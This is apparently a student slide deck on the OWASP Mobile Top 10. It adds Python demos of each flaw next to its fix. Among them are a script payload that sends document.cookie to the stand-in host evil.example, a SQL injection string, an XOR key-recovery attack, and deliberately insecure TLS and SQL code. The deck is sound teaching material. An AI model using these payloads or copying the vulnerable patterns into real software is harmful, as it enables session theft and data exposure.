An Inside Look at Mobile Security Android & iOS Zachary Hance & Andrew Phifer Dr Harold Grossman.

Introduction

As of February 27th, 2012, according to techcrunch.com, "Explosive growth. That's Android. Google's mobile platform is up 250 percent over last year and, according to Andy Rubin, SVP, Mobile and Digital Content, Google is seeing 850,000 activations every day." According to dailymail.co.uk, "Apple's total figure of 250 million activations of devices running iOS, including iPods, iPhones, and iPads. In November last year, Android was already standing at 200 million activations."

Mobile Security Risks – Top 10 (the OWASP Mobile Top 10, 2011 edition)

1. Insecure Data Storage
2. Weak Server Side Controls
3. Insufficient Transport Layer Protection
4. Client-Side Injection
5. Poor Authorization and Authentication
6. Improper Session Handling
7. Security Decisions via Untrusted Inputs
8. Side Channel Data Leakage
9. Broken Cryptography
10. Sensitive Information Disclosure

Insecure Data Storage

Resulting from:
- Not encrypting data at rest
- Caching data not intended for long-term storage (responses, screenshots, keystrokes)
- Weak or global file permissions (e.g., world-readable files or external storage)
- Not leveraging platform best practices (private app storage, the platform keystore/keychain)

Impacts from this attack:
- Confidentiality of data lost
- Credentials disclosed
- Privacy violations
- Non-compliance
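Added example, not from the original slides: a small audit script for the "weak or global permissions" and "caching" mistakes above. On Android every app runs as its own Linux UID, so a file written with MODE_WORLD_READABLE is just a file whose "other" permission bits are set; the same POSIX check works on any Linux-based system. The directory layout, file names and contents are constructed for the demo.

```python
"""Audit an app's private data directory for files other apps could read and
for credentials stored in plaintext.  On Android each app runs as its own
Linux UID, so a file written with MODE_WORLD_READABLE is simply a file whose
'other' permission bits are set; the same check applies to any POSIX system.
Added example: the directory layout, file names and contents are constructed."""
import os
import stat
import tempfile

# Byte strings whose presence in a stored file usually means credential material.
SENSITIVE_MARKERS = (b"password", b"token", b"secret", b"authorization")


def write_private(path, data):
    """Create the file as 0600 from the start (no window where it is readable)."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)


def write_world_readable(path, data):
    """The insecure counterpart, equivalent to Android's MODE_WORLD_READABLE."""
    with open(path, "wb") as f:
        f.write(data)
    os.chmod(path, 0o644)


def audit_data_dir(root):
    """Return sorted (relative_path, finding) pairs for every risky file under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if os.stat(full).st_mode & (stat.S_IRWXG | stat.S_IRWXO):
                findings.append((rel, "readable by other UIDs"))
            with open(full, "rb") as f:
                head = f.read(4096).lower()
            if any(marker in head for marker in SENSITIVE_MARKERS):
                findings.append((rel, "contains plaintext credential material"))
    return sorted(findings)


def build_demo_dir():
    """Constructed sample: one correct file and the two mistakes the slide lists."""
    root = tempfile.mkdtemp(prefix="appdata-")
    os.makedirs(os.path.join(root, "shared_prefs"))
    os.makedirs(os.path.join(root, "cache"))
    write_private(os.path.join(root, "shared_prefs", "settings.xml"),
                  b"<map><boolean name='dark_mode' value='true'/></map>")
    # Mistake 1: credentials in a world-readable preferences file.
    write_world_readable(os.path.join(root, "shared_prefs", "auth.xml"),
                         b"<map><string name='password'>hunter2</string></map>")
    # Mistake 2: an HTTP response cached to disk with its session token intact.
    write_private(os.path.join(root, "cache", "last_response.json"),
                  b'{"token": "eyJhbGciOiJIUzI1NiJ9.demo", "user": "alice"}')
    return root


if __name__ == "__main__":
    for rel, why in audit_data_dir(build_demo_dir()):
        print(rel + ": " + why)
```

The content check is deliberately crude (a handful of markers in the first 4 KiB); on a real device you would run it over /data/data/<package>/ from an adb shell on a debuggable build, and treat any hit in cache/ or shared_prefs/ as something that should have been encrypted with a key held in the platform keystore, or not written at all.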

Weak Server Side Controls

Resulting from:
- Trusting the client: a mobile app, like any client, can be modified or impersonated, so nothing it sends can be assumed valid
- Applies to the backend services the app talks to, not to the device itself

Impacts from this attack:
- Confidentiality of data lost
- Integrity of data not trusted

Insufficient Transport Layer Protection

Resulting from:
- Complete lack of encryption for transmitted data
- Weakly encrypted data in transit (old protocol versions, weak cipher suites)
- Strong encryption, but ignoring security warnings
- Ignoring certificate validation errors, or falling back to plain text when the TLS connection fails

Impacts from this attack:
- A man-in-the-middle attacker reads the data
- Tampering with data
- Confidentiality of data is lost
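Added example, not from the slides: the "ignore certificate validation" mistake and its fix, written against Python's standard ssl module. The Android equivalent of insecure_context() is an X509TrustManager whose checkServerTrusted() never throws, or a HostnameVerifier that always returns true. The checker only inspects the configuration object, so it runs offline; connect_or_fail() is the hardened connect helper and is the one part that needs a network.

```python
"""Check a client TLS configuration for the mistakes on the slide: no
certificate verification, no hostname check, and old protocol versions.
Added example using only Python's ssl module; no network access is needed
because only the configuration object is inspected."""
import socket
import ssl


def insecure_context():
    """What 'accept all certificates' looks like in code."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode can change
    ctx.verify_mode = ssl.CERT_NONE     # any certificate, including an attacker's, is accepted
    try:
        ctx.minimum_version = ssl.TLSVersion.TLSv1   # "stay compatible with old servers"
    except ValueError:
        pass                            # OpenSSL built without TLS 1.0; keep the default
    return ctx


def secure_context():
    """Platform trust store, hostname verification and TLS 1.2 as the floor."""
    ctx = ssl.create_default_context()  # CERT_REQUIRED + check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def tls_findings(ctx):
    """Return the list of weaknesses found in ctx (empty means acceptable)."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("server certificate is not verified (verify_mode != CERT_REQUIRED)")
    if not ctx.check_hostname:
        findings.append("certificate is not matched against the host name")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("TLS 1.0/1.1 negotiable (minimum_version below TLS 1.2)")
    return findings


def connect_or_fail(host, port=443):
    """Hardened connection helper: fail closed instead of falling back to plaintext.
    Needs network access; not used by the offline checks above."""
    ctx = secure_context()
    try:
        with socket.create_connection((host, port), timeout=5) as raw:
            with ctx.wrap_socket(raw, server_hostname=host) as tls:
                return tls.version()
    except ssl.SSLCertVerificationError as exc:
        # Do NOT retry over http:// here; surface the error to the user instead.
        raise RuntimeError("refusing to talk to %s: %s" % (host, exc)) from exc


if __name__ == "__main__":
    print("insecure:", tls_findings(insecure_context()))
    print("secure:  ", tls_findings(secure_context()))
```

The fallback case on the slide is the silent one: an app that catches the verification error and retries over http:// has converted an active attacker's failed TLS interception into a successful plaintext capture. The hardened helper propagates the error instead.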

Client Side Injection

Resulting from:
- Apps that render untrusted content through browser libraries (WebViews)
- HTML/JavaScript and SQL injection into data the app displays or stores locally

Impacts from this attack:
- Device is compromised
- Toll fraud
- Privilege escalation
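Added example, not from the slides: both injections the slide names, reproduced in Python against sqlite3 (the same database engine Android and iOS apps embed) and against HTML destined for a WebView. The "vulnerable" functions keep the bug; the "safe" ones show the fix. The table, rows and the evil.example host are constructed for the demo.

```python
"""Client-side injection in a mobile app, reproduced with Python's sqlite3
(the same engine Android and iOS apps embed). The 'vulnerable' functions keep
the bug the slide describes; the 'safe' ones show the fix. Added example;
the table, rows and payloads are constructed for the demo."""
import html
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE notes (owner TEXT, body TEXT)")
    conn.executemany("INSERT INTO notes VALUES (?, ?)", [
        ("alice", "dentist on Tuesday"),
        ("bob", "PIN is 4417"),      # another user's private note on the same device
    ])
    return conn


def notes_vulnerable(conn, owner):
    """String concatenation: the caller's input becomes part of the SQL grammar."""
    sql = "SELECT body FROM notes WHERE owner = '" + owner + "'"
    return [row[0] for row in conn.execute(sql)]


def notes_safe(conn, owner):
    """Bound parameter: the input is data only, whatever characters it holds.
    Android: db.query(..., selectionArgs) or rawQuery(sql, args); iOS: sqlite3_bind_text."""
    return [row[0] for row in conn.execute(
        "SELECT body FROM notes WHERE owner = ?", (owner,))]


def render_vulnerable(display_name):
    """HTML assembled from untrusted text and handed to a WebView via
    loadData()/loadHTMLString(): script runs if JavaScript is enabled."""
    return "<p>Welcome, " + display_name + "</p>"


def render_safe(display_name):
    """Escape before interpolating so the text can never close the tag."""
    return "<p>Welcome, " + html.escape(display_name, quote=True) + "</p>"


PAYLOAD_SQL = "x' OR '1'='1"
PAYLOAD_HTML = "<script>fetch('https://evil.example/?c='+document.cookie)</script>"

if __name__ == "__main__":
    db = make_db()
    print(notes_vulnerable(db, PAYLOAD_SQL))   # every user's notes, not just the caller's
    print(notes_safe(db, PAYLOAD_SQL))         # [] : no owner is literally named that
    print(render_vulnerable(PAYLOAD_HTML))
    print(render_safe(PAYLOAD_HTML))
```

The slide's "toll fraud" and "device compromised" impacts follow from the WebView case: with JavaScript enabled and a JavaScript-to-native bridge exposed (addJavascriptInterface on Android), injected script can call the app's own native methods, including ones that send SMS or read files.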

Poor Authorization and Authentication

Resulting from:
- Relying on immutable, easily learned values (device identifiers such as IMEI or UDID) to authenticate a user's device

Impacts:
- Privilege escalation
- Unauthorized access

Improper Session Handling

Resulting from:
- Mobile apps running for long periods of time, and the ways they maintain sessions across that time (HTTP cookies, OAuth tokens, SSO authentication services)
- Sessions that never expire, cannot be revoked, or are not protected from tampering

Impacts:
- Privilege escalation
- Unauthorized access
- Circumventing licensing and payments
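Added example covering the two previous slides (authenticating by an immutable device identifier, and session handling), not from the original deck: the backend side of both patterns using only the standard library. The secret, the user records, the IMEI value and the timestamps are constructed for the demo; the token format is a minimal HMAC-signed claim set, not any particular library's.

```python
"""Two ways a backend can decide who is calling: trusting an immutable device
identifier sent by the app (the mistake on the slide) versus a server-issued,
signed, short-lived session token that can be revoked.  Added example using
only the standard library; secret, users and timestamps are constructed."""
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional

SERVER_SECRET = secrets.token_bytes(32)   # lives only on the server
SESSION_TTL = 15 * 60                     # seconds a token stays valid

# Insecure: a lookup keyed on the IMEI/UDID the app puts in a header.
DEVICES = {"353918051234567": "alice"}    # constructed IMEI -> account


def login_by_device_id(headers) -> Optional[str]:
    """Whoever learns the identifier (other apps, carrier logs, crash reports)
    can send it and is that user indefinitely; it cannot be rotated or revoked."""
    return DEVICES.get(headers.get("X-Device-Id", ""))


# Hardened: integrity-protected token with expiry and server-side revocation.
REVOKED = set()


def _sign(body: bytes) -> str:
    return hmac.new(SERVER_SECRET, body, hashlib.sha256).hexdigest()


def issue_token(user: str, now: float) -> str:
    claims = {"sub": user, "exp": int(now) + SESSION_TTL, "jti": secrets.token_hex(8)}
    body = json.dumps(claims, separators=(",", ":")).encode()
    return body.hex() + "." + _sign(body)


def verify_token(token: str, now: float) -> Optional[str]:
    """Return the user for a valid token; None if malformed, tampered, expired or revoked."""
    try:
        body_hex, sig = token.split(".", 1)
        body = bytes.fromhex(body_hex)
    except ValueError:
        return None
    if not hmac.compare_digest(_sign(body), sig):   # constant-time comparison
        return None
    claims = json.loads(body)
    if claims["exp"] <= now or claims["jti"] in REVOKED:
        return None
    return claims["sub"]


def logout(token: str) -> None:
    """Invalidate server-side so a copied token dies with the session."""
    body_hex = token.split(".", 1)[0]
    REVOKED.add(json.loads(bytes.fromhex(body_hex))["jti"])


def tamper(token: str, new_user: str) -> str:
    """Attacker attempt: rewrite the subject but keep the original signature."""
    body_hex, sig = token.split(".", 1)
    claims = json.loads(bytes.fromhex(body_hex))
    claims["sub"] = new_user
    return json.dumps(claims, separators=(",", ":")).encode().hex() + "." + sig


if __name__ == "__main__":
    now = time.time()
    print(login_by_device_id({"X-Device-Id": "353918051234567"}))   # alice, forever
    tok = issue_token("alice", now)
    print(verify_token(tok, now), verify_token(tok, now + SESSION_TTL + 1))
    print(verify_token(tamper(tok, "bob"), now))
```

The device-ID lookup has no notion of logout, expiry or compromise: once the IMEI leaks, the account is permanently open. The token version fails closed on every check, and because the "jti" is stored server-side a stolen token can be killed without rotating the signing secret.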

Security Decisions Via Untrusted Inputs

Resulting from:
- Apps acting on input from other apps or processes (intents, URL handlers, inter-process messages) without verifying it, which lets an attacker bypass permissions and the platform security model

Main attack sources:
- Malicious apps
- Client side injection

Impacts:
- Consuming paid resources
- Data exfiltration
- Privilege escalation

Side Channel Data Leakage

Resulting from:
- A mix of platform features left enabled and programming flaws that cause sensitive data to end up in unintended places: web caches, keystroke logging (keyboard autocorrect caches), screenshots taken on backgrounding, system logs, and temp directories

Impacts:
- Data retained indefinitely
- Privacy violations

Broken Cryptography

Resulting from:
- Incorrect use of otherwise strong cryptography libraries (hard-coded keys, keys stored next to the data, weak modes or parameters)
- Custom, easily defeated cryptography implementations

Impacts:
- Confidentiality of data lost
- Privilege escalation
- Circumventing business logic
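Added example, not from the slides: the "custom, easily defeated" case made concrete. A repeating-key XOR "cipher" with a key baked into the app is the classic home-made scheme; one record whose format is predictable (here, every record starts with the same JSON prefix) lets an attacker recover the key and decrypt everything else. The key and records are constructed for the demo.

```python
"""'Custom' cryptography of the kind the slide warns about: a repeating-key XOR
'cipher' with a hard-coded key, and the known-plaintext attack that recovers
the key from a single record whose format is predictable, then decrypts every
other record the app stored.  Added example; key and records are constructed."""
import itertools

KEY = b"s3cr3tAppKey!!!!"                          # 16 bytes, baked into the app binary (constructed)
KNOWN_PREFIX = b'{"schema":"notes-v1","owner":"'   # every stored record starts this way
RECORDS = [                                         # constructed plaintext records
    b'{"schema":"notes-v1","owner":"alice","body":"dentist on Tuesday"}',
    b'{"schema":"notes-v1","owner":"bob","body":"PIN is 4417"}',
]


def xor_cipher(key, data):
    """'Encrypt' and 'decrypt' are the same operation; the key simply repeats."""
    return bytes(b ^ k for b, k in zip(data, itertools.cycle(key)))


def find_key_length(ciphertext, known_plaintext, max_len=64):
    """Smallest period consistent with the keystream C xor P over the known prefix.
    The known prefix must be longer than the key for the answer to be reliable."""
    stream = xor_cipher(known_plaintext, ciphertext[:len(known_plaintext)])
    for n in range(1, max_len + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return n
    raise ValueError("no period up to max_len fits the known plaintext")


def recover_key(ciphertext, known_plaintext, key_len):
    """One full period of the keystream is the key."""
    if len(known_plaintext) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext")
    stream = xor_cipher(known_plaintext, ciphertext[:len(known_plaintext)])
    return stream[:key_len]


def break_store(encrypted):
    """Attacker's view: ciphertexts only, plus knowledge of the record format."""
    key_len = find_key_length(encrypted[0], KNOWN_PREFIX)
    key = recover_key(encrypted[0], KNOWN_PREFIX, key_len)
    return key, [xor_cipher(key, c) for c in encrypted]


if __name__ == "__main__":
    stored = [xor_cipher(KEY, r) for r in RECORDS]
    key, plain = break_store(stored)
    print("recovered key:", key)
    for p in plain:
        print(p.decode())
```

The attack needs no access to the app binary at all; a hard-coded key only makes it faster. The fix is not a better home-made cipher but the platform's own primitives (an authenticated mode such as AES-GCM from the system crypto library) with the key generated in and protected by the Android Keystore or iOS Keychain, so that no copy of it sits beside the data.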

Sensitive Information Disclosure

Resulting from:
- Apps are easily reverse engineered; code obfuscation slows this down but does not prevent it

Impacts:
- Credentials disclosed
- Intellectual property exposed
- Examples: API keys, passwords, sensitive business logic
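Added example serving this slide and the Side Channel Data Leakage slide, not from the original deck: one scanner that looks for credential material in two places it should never be, device logs and the string table of the shipped binary. The logcat lines and the strings-style dump of a classes.dex are constructed for the demo (the AKIA value is the example access key id AWS itself uses in its documentation); the patterns are deliberately simple and meant as a starting point.

```python
"""Find sensitive data where it should not be: in device logs (side-channel
leakage) and in the strings of the shipped binary (sensitive information
disclosure).  Added example; the sample lines imitate `adb logcat` and
`strings classes.dex` output and are constructed for the demo."""
import re

CARD = "card number (Luhn-valid)"
PATTERNS = {
    "password in log/string": re.compile(r"(?i)\b(pass(word)?|pwd)\b\s*[:=]\s*\S+"),
    "bearer/session token": re.compile(r"(?i)\b(bearer|token|session_?id)\b\s*[:=]?\s*[A-Za-z0-9._-]{16,}"),
    "AWS access key id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private key block": re.compile(r"-----BEGIN (RSA |EC )?PRIVATE KEY-----"),
    CARD: re.compile(r"\b(?:\d[ -]?){15}\d\b"),
    "URL with embedded credentials": re.compile(r"\b[a-z][a-z0-9+.-]*://[^/\s:@]+:[^/\s@]+@"),
}

# Constructed logcat output from a debug build.
LOGCAT = [
    "D/LoginActivity: attempting login for alice",
    "D/LoginActivity: password=hunter2",
    "I/HttpClient: Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.e30.demo-token-value",
    "V/Checkout: charging card 4111 1111 1111 1111",
    "I/Sync: uploaded 3 records",
]

# Constructed `strings` output from the app's classes.dex.
APK_STRINGS = [
    "Lcom/example/app/ApiClient;",
    "https://api.example.com/v1/",
    "AKIAIOSFODNN7EXAMPLE",
    "-----BEGIN RSA PRIVATE KEY-----",
    "mysql://app:Sup3rS3cret@db.internal.example/prod",
    "Invalid username or password",
]


def luhn_ok(digits):
    """Checksum used by payment card numbers; cuts false positives on 16-digit IDs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def scan(lines, source):
    """Return (source, line_number, label) for each pattern hit, one per label per line."""
    findings = []
    for n, line in enumerate(lines, 1):
        for label, rx in PATTERNS.items():
            m = rx.search(line)
            if not m:
                continue
            if label == CARD and not luhn_ok(re.sub(r"\D", "", m.group())):
                continue
            findings.append((source, n, label))
    return findings


if __name__ == "__main__":
    for src, n, label in scan(LOGCAT, "logcat") + scan(APK_STRINGS, "classes.dex"):
        print("%s:%d: %s" % (src, n, label))
```

For the log side, the fix is in the app (never log request bodies or headers in release builds; strip Log calls with the build tooling). For the binary side, obfuscation renames classes but leaves string constants intact, which is why secrets found this way should be treated as already public and moved server-side or fetched at runtime after authentication.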

Which mobile OS is more secure?

- Collectively, mobile operating systems are more secure than desktop operating systems.
- However, the tide is beginning to turn, with more malware being developed for mobile operating systems.

Conflict of Interest

- Mobile devices do not give users complete control over their own devices.
- Users who root or jailbreak their devices typically do so using the same vulnerabilities that malware is developed for.
- This conflict of interest between vulnerability disclosure and the ability of people to fully control their own devices poses a serious security issue.

Interesting Stats

Tips For Generally Keeping Safe

1. Only download apps from trusted sources, such as reputable app stores and download sites. Remember to look at the developer name, reviews, and star ratings.
2. After clicking on a web link, pay close attention to the address to make sure it matches the website it claims to be, especially if you are asked to enter account or login information.
3. Set a password on your mobile device so that if it is lost or stolen, your data is difficult to access.
4. Download a mobile security tool that scans every app you download for malware and spyware and can help you locate a lost or stolen device. For extra protection, make sure your security app can also protect you from unsafe websites.
5. Be alert for unusual behaviour on your phone, which could be a sign that it is infected. This may include unusual text messages, strange charges on the phone bill, and suddenly decreased battery life.
6. Install OS and firmware updates as soon as they are available for your device.

In Summary

- The top ten threats are not the only threats.
- Threats are grouped into application-based, web-based, network-based, and physical categories.
- Mobile devices are increasingly being targeted by malware.
- Staying up to date on trends in mobile security is the best chance of keeping your device clean.
- Mobile security is equally important for the developer and the end user.
